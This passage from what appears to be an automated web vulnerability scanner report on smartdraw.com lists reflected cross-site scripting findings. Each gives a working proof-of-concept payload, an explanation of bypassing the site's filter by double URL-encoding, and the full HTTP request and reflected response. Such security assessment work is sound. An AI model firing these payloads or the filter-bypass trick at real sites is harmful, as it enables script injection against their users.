<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?fbd65"style="x:expression(alert(1))"a43b560b887=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.166. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1 was submitted in the REST URL parameter 2. This input was echoed as 80d8a"style="x:expression(alert(1))"b9c460ef3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/80d8a%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b9c460ef3f1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8774
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gvwmqnneobzhy02artx2kqbp; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/80d8a"style="x:expression(alert(1))"b9c460ef3f1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.167. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f was submitted in the REST URL parameter 2. This input was echoed as a1cdd"style="x:expression(alert(1))"48d79440d3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/a1cdd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252248d79440d3f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b00pwu55pf2clt55u0k5o0rq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/specials/a1cdd"style="x:expression(alert(1))"48d79440d3f/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d74b"><script>alert(1)</script>7dda0913f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?8d74b"><script>alert(1)</script>7dda0913f6b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 03 Feb 2011 20:29:21 GMT
Content-Length: 12908
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=wpmm4p551c2dea45k15ywp45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=99C7B3EB-F63C-4257-8835-C875E636C1F0; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/diagram.asp/x22/?8d74b"><script>alert(1)</script>7dda0913f6b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/diagram.asp/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932a"><script>alert(1)</script>9f207111f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /specials/diagram.asp/x22?f932a"><script>alert(1)</script>9f207111f3=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=dia; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4dwhidrvpjbkw1msj4gobert; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6103C386-4733-4A43-95B7-51E67A55D6CD; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: SDLINKID=9184; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12901
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/diagram.asp/x22/?f932a"><script>alert(1)</script>9f207111f3=1" rel="nofollow" target="_blank">
...[SNIP]...

3.170. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/floorplans.asp/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32 was submitted in the REST URL parameter 2. This input was echoed as fb652"style="x:expression(alert(1))"3dd903a5e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /specials/fb652%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25223dd903a5e32/x22 HTTP